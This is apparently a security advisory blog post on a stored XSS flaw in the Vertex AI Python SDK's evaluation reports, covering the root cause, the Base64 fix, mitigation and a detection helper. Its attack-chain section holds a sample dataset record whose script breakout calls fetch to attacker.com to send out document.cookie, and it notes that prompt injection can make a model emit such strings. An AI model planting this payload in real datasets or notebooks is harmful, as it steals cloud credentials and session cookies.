Feb 20, 2026
The Vertex AI SDK for Python (v1.98.0 - v1.130.0) unsafely embedded JSON data into HTML reports. Attackers can inject malicious scripts into datasets or model outputs, which execute when a victim visualizes the evaluation results in Jupyter/Colab. Upgrade to 1.131.0 immediately.
A critical Stored Cross-Site Scripting (XSS) vulnerability in the Google Cloud Vertex AI Python SDK allows attackers to execute arbitrary JavaScript within a victim's Jupyter or Colab environment. By poisoning model evaluation datasets, an attacker can hijack the visualization rendering process to exfiltrate credentials or manipulate notebook sessions.
In the modern AI landscape, the Jupyter Notebook is the new shell. Data scientists and ML engineers live inside these environments, processing massive datasets and visualizing complex model behaviors. We trust these environments implicitly. We assume that when we ask a library to "draw a graph of this model's performance," it will do just that—draw a graph.
But what if the graph bites back? CVE-2026-2472 is exactly that scenario. It resides in the google-cloud-aiplatform SDK, specifically within the _genai/_evals_visualization component. This tool is designed to take raw evaluation data—prompts, responses, and metrics—and render them into a pretty HTML report right inside your notebook.
The vulnerability is a classic case of "Web 1.0 problems in Web 3.0 technologies." The SDK takes data that is potentially tainted (like model outputs or external datasets) and blindly trusts it during HTML generation. If you think XSS is just for websites, think again. In a notebook environment, XSS isn't just an alert box; it's a potential gateway to your cloud credentials.
The root cause here is embarrassingly simple, yet devastatingly effective. The developers used Python f-strings to construct HTML templates. While f-strings are great for performance and readability, they are catastrophic for security when handling untrusted input destined for a browser context.
The vulnerable code in _get_evaluation_html looked something like this:
```python
def _get_evaluation_html(eval_result_json: str) -> str:
    return f"""
    <html>
      <body>
        <script>
          const data = {eval_result_json};
          renderChart(data);
        </script>
      </body>
    </html>
    """
```

See the problem? The code assumes `eval_result_json` is a safe JSON string. But the browser's HTML parser runs before the JavaScript engine. If the JSON string contains `</script>`, the HTML parser sees that tag and immediately closes the script block, treating whatever follows as raw HTML.
This is the classic "context confusion" bug. The Python code treats the data as a string, but the browser treats it as structural markup. By breaking out of the script context, an attacker can inject their own <script> tags, effectively turning a data visualization tool into a remote code execution platform within the victim's browser.
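A few lines of Python make the breakout concrete. This is a standalone sketch (not SDK code); the key observation is that `json.dumps` emits valid JSON but does not escape the `/` character, so a literal `</script>` survives interpolation into the page intact:

```python
import json

# Hypothetical payload mimicking a poisoned model response.
payload = {"response": "</script><script>alert(1)</script>"}

# json.dumps produces valid JSON, but "<" and "/" are not escaped,
# so the breakout sequence survives into the serialized string.
encoded = json.dumps(payload)
html = f"<script>const data = {encoded};</script>"

# The browser's HTML parser closes the script block at the FIRST
# "</script>" it encounters -- which here sits inside a string literal.
print("</script>" in encoded)  # True: the breakout sequence is intact
```

The JavaScript engine never gets a say: by the time it would run, the HTML parser has already terminated the script element early and started interpreting the attacker's markup.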
Let's look at the fix (Commit 8a00d43dbd24e95dbab6ea32c63ce0a5a1849480) to understand exactly how Google patched this. They moved from direct interpolation to a Base64-encoding strategy.
The Vulnerable Code (Simplified):
```python
# _genai/_evals_visualization.py
template = """
<script>
  var vizData = {json_payload};
</script>
"""
return template.format(json_payload=json.dumps(data))
```

The Fixed Code:
```python
# _genai/_evals_visualization.py (simplified)
import base64

def _encode_to_base64(data: str) -> str:
    return base64.b64encode(data.encode("utf-8")).decode("utf-8")

# ... inside the template generator ...
payload_b64 = _encode_to_base64(json.dumps(data))
template = """
<script>
  const b64 = "{payload_b64}";
  const jsonStr = new TextDecoder().decode(
      Uint8Array.from(atob(b64), c => c.charCodeAt(0))
  );
  var vizData = JSON.parse(jsonStr);
</script>
"""
return template.format(payload_b64=payload_b64)
```

By Base64-encoding the payload on the server (Python side) and decoding it on the client (JavaScript side), the data travels through a "tunnel" past the HTML parser. The browser only ever sees Base64 alphabet characters, so tags like `</script>` never appear in the DOM during the initial parse phase. It's a robust, standard defense against this specific class of XSS.
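The defense can be verified end-to-end from Python alone. The following standalone check mirrors what `atob` + `TextDecoder` + `JSON.parse` do on the browser side:

```python
import base64
import json
import string

data = {"response": "</script><script>evil()</script>"}
b64 = base64.b64encode(json.dumps(data).encode("utf-8")).decode("utf-8")

# The Base64 alphabet is A-Za-z0-9+/= -- "<" and ">" cannot occur,
# so the HTML parser can never see a closing tag inside the payload.
assert set(b64) <= set(string.ascii_letters + string.digits + "+/=")

# Round-trip decode (the Python equivalent of atob + TextDecoder + JSON.parse):
restored = json.loads(base64.b64decode(b64).decode("utf-8"))
assert restored == data
```

The design trade-off is a small size inflation (~33%) and one extra decode step in the browser, in exchange for a payload that is structurally inert during HTML parsing.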
To exploit this, we don't need to hack a server directly. We just need to poison the data supply chain. Imagine you are evaluating a Large Language Model (LLM): you download a "standard" evaluation dataset from a public repository, or an attacker uses prompt injection to make the model emit specific strings.
Here is the attack chain:
```json
{
  "prompt": "Explain quantum physics",
  "response": "</script><script>fetch('https://attacker.com/steal?c='+btoa(document.cookie))</script>"
}
```

The attacker plants a record like this in a shared dataset. The victim then runs the evaluation (for example, via `vertexai.preview.generative_models.evaluation`) to see how well their model performed, and the SDK generates the HTML report containing the payload.

This is particularly dangerous in cloud-hosted notebooks (like Colab or Vertex AI Workbench) where the browser session often holds authentication tokens for the cloud provider. A successful XSS here could allow an attacker to pivot from a simple visualization bug to full cloud account compromise.
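Until you are on a patched version, one pragmatic precaution is to scan untrusted datasets for markup before visualizing them. The following is an illustrative helper (`find_suspicious_records` is our own name, not an SDK API), and the pattern list is deliberately conservative:

```python
import json
import re

# Hypothetical defensive check: flag records whose serialized form
# contains HTML/script breakout sequences before rendering any report.
BREAKOUT = re.compile(r"</?\s*script|<\s*img|javascript:", re.IGNORECASE)

def find_suspicious_records(records):
    """Return indices of records whose JSON serialization looks like markup."""
    return [i for i, rec in enumerate(records)
            if BREAKOUT.search(json.dumps(rec))]

dataset = [
    {"prompt": "Explain quantum physics",
     "response": "</script><script>fetch('https://attacker.com')</script>"},
    {"prompt": "Summarize this paper",
     "response": "Sure, here is a summary."},
]
print(find_suspicious_records(dataset))  # [0]
```

A blocklist like this is a triage tool, not a sanitizer; the real fix is output encoding at render time, as the patch does.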
While the main visualization vector was patched in version 1.131.0, a closer look at the codebase suggests the battle might not be entirely over. The patch focused heavily on the eval_result_json variable, but other functions like _get_status_html still use string interpolation for error messages.
```python
from typing import Optional

def _get_status_html(status: str, error_message: Optional[str] = None) -> str:
    return f"""
    <div>
      <p><b>Status:</b> {status}</p>
      {error_message}
    </div>
    """
```

If an attacker can force the evaluation engine to throw an error that contains user-controlled input (for example, a malformed prompt that gets reflected in the error log), they might still be able to achieve XSS. This serves as a reminder that fixing the known vector is rarely enough; you have to sanitize the pattern, not just the instance. Always treat error messages as untrusted input.
The mitigation is straightforward: stop using the vulnerable versions. The patch was released in version 1.131.0 on December 16, 2025. If you are running anything between 1.98.0 and 1.130.0, you are exposed.
Run this in your environment immediately:
```bash
pip install --upgrade "google-cloud-aiplatform>=1.131.0"
```

(Quote the requirement specifier, or your shell will interpret `>=` as a redirection.) If you cannot upgrade for compatibility reasons (classic Python dependency hell), you must avoid using the visualization features of the Vertex AI SDK on untrusted data. Treat all evaluation results as radioactive material until they are sanitized.
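If you manage many environments, a small version gate helps triage. This sketch hard-codes the affected range from the advisory (`is_vulnerable` is an illustrative helper, not part of any tool):

```python
from importlib.metadata import PackageNotFoundError, version

def is_vulnerable(ver: str) -> bool:
    """True if ver falls in the affected range [1.98.0, 1.131.0)."""
    major, minor = (int(p) for p in ver.split(".")[:2])
    return (1, 98) <= (major, minor) < (1, 131)

try:
    installed = version("google-cloud-aiplatform")
    status = "VULNERABLE -- upgrade now" if is_vulnerable(installed) else "ok"
    print(f"google-cloud-aiplatform {installed}: {status}")
except PackageNotFoundError:
    print("google-cloud-aiplatform is not installed")
```

Run it in every notebook environment you control, including long-lived Vertex AI Workbench instances that rarely get rebuilt.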
| Product | Affected Versions | Fixed Version |
|---|---|---|
| google-cloud-aiplatform (Google) | >= 1.98.0, < 1.131.0 | 1.131.0 |
| Attribute | Detail |
|---|---|
| CVE ID | CVE-2026-2472 |
| CVSS v4.0 | 8.6 (High) |
| CWE | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
| Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/U:Amber |
| Affected Versions | 1.98.0 - 1.130.0 |
| Fix Version | 1.131.0 |